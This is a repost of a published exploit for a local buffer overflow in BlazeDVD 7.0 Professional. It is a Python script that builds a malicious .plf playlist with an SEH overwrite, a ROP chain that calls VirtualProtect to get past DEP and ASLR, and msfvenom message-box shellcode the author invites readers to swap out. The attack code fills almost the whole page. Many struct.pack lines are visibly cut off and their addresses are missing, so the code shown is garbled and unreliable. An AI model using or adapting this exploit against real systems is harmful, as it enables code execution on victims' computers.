BlazeDVD 7.0 Professional Buffer Overflow ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on September 1st, 2020 📆 | 2830 Views ⚑

0

BlazeDVD 7.0 Professional Buffer Overflow ≈ Packet Storm

## Title: BlazeDVD 7.0 Professional – ‘.plf’ Local Buffer Overflow (SEH,ASLR,DEP)
## Author: emalp
## Date: 2020-08-31
## Vendor Homepage: http://www.blazevideo.com/
## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
## Version: 7.0.0.0
## Tested on: Windows 7 Home Basic

# Run this file
# bfile.plf will be generated
# In blazeDVD open playlist and select bfile.plf
# a pop up box will appear with text ’emalp’

## Change shellcode according to your needs
## Shellcode max size is aroung 700 bytes.

# bad chars:
# x00, x0a, x0b, x1a

import struct

bfile = open(‘bfile.plf’,’w’)

buf = ‘A’*84
buf += struct.pack(‘buf += ‘AAAA’ # ret 04 ting from sehandler
buf += ‘AAAA’*3 # bypassing 12 bytes i.e 0c
buf += struct.pack(‘buf += ‘A’*500
buf += ‘BBBB’ # nseh
buf += struct.pack(‘

#———————————————————————
# this way we have a lot more space for shellcode.
buf += ‘AAAA’
# esp lands here.
#setting up the dynamic pointer for virtual protect
buf += struct.pack(‘buf += struct.pack(‘buf += struct.pack(‘buf += struct.pack(‘# now eax has the kernel32.dll pointer
buf += struct.pack(‘buf += struct.pack(‘buf += ‘XXXX’ # ret 4 padding
buf += struct.pack(‘buf += struct.pack(‘# right now eax = 98a3; esi = [0012f95c] = k32.dll val
buf += struct.pack(‘buf += struct.pack(‘buf += ‘XXXX’ # pop esi padding
buf += struct.pack(‘# now eax has the pointer to VirtualProtect
#————————————————————————

# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
# SETTING ESI
buf += struct.pack(‘# SETTING EBP
buf += struct.pack(‘buf += ‘XXXX’ # prev ret 4 padding
buf += struct.pack(‘# SETTING EBX
buf += struct.pack(‘buf += struct.pack(‘buf += struct.pack(‘buf += struct.pack(‘# SETTING EDX
buf += struct.pack(‘buf += struct.pack(‘buf += struct.pack(‘buf += struct.pack(‘# SETTING ECX
buf += struct.pack(‘buf += struct.pack(‘# SETTING EDI
buf += struct.pack(‘buf += struct.pack(‘# SETTING EAX
buf += struct.pack(‘buf += struct.pack(‘# FINALLY PUSHAD
buf += struct.pack(‘

buf += ‘x90x90x90x90’*4

# shellcode generated using:
# msfvenom -a x86 –platform windows -p windows/messagebox TEXT=”emalp”
# -b ‘x00x0ax0bx1a’
buf += (
“xbbx42xa8xb5x43xdaxc7xd9x74x24xf4x5ax33xc9xb1”
“x41x83xc2x04x31x5ax0fx03x5ax4dx4ax40x9axbax11”
“x72x69x18xd2xb4x40xd2x6dx86xadx76x19x99x1dxfd”
“x6bx56xd5x77x88xedxafx7fx3bx8fx0fxf4x0dx48x1f”
“x12x07x5bxc6x23x36x64x18x43x33xf7xffxa7xc8x4d”
“x3cx2cx9ax65x44x33xc9xfdxfex2bx86x58xdfx4ax73”
“xbfx2bx05x08x74xdfx94xe0x44x20xa7x3cx5ax72x43”
“x7cxd7x8cx8axb2x15x92xcbxa6xd2xafxafx1cx33xa5”
“xaexd6x19x61x31x02xfbxe2x3dx9fx8fxafx21x1ex7b”
“xc4x5dxabx7ax33xd4xefx58xdfx87x2cx12xd7x6ex67”
“xdax0dxf9x45xb5x43xb7x47xaax0exafxc7xcdx50xd0”
“x71x74xabx95xfcxafx51x9ax87x4cxb2x0ex60xe2x45”
“x51x8fx72xfcxa5x18xe9x93x95x99x99x58xe7x37x3e”
“xf7x72x3bxdbx75x4cx60xabx26x88x9cx25x30x86x5f”
“x60xb9xafx62xdbx7ax07xc0x91xc0xd0x19x0ex6bx36”
“x7exb1x74x39xe9x22xf3x9dxcaxd4x62x7ax6ex67x0d”
“xc9x15x14xbexe0x0ex52x1cx26xbbxeax7ex4excbxb4”
“xa0xaex43x20xccxcfxffx9bxc7x87x4cxf8xd2x1exad”
“x31x0fx72x7dx63xfdx8dx51xb2xc1x21xadxe0xc9”
)
buf += ‘x90x90x90x90’*5

buf += ‘E’*200

bfile.write(buf)
bfile.close()

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...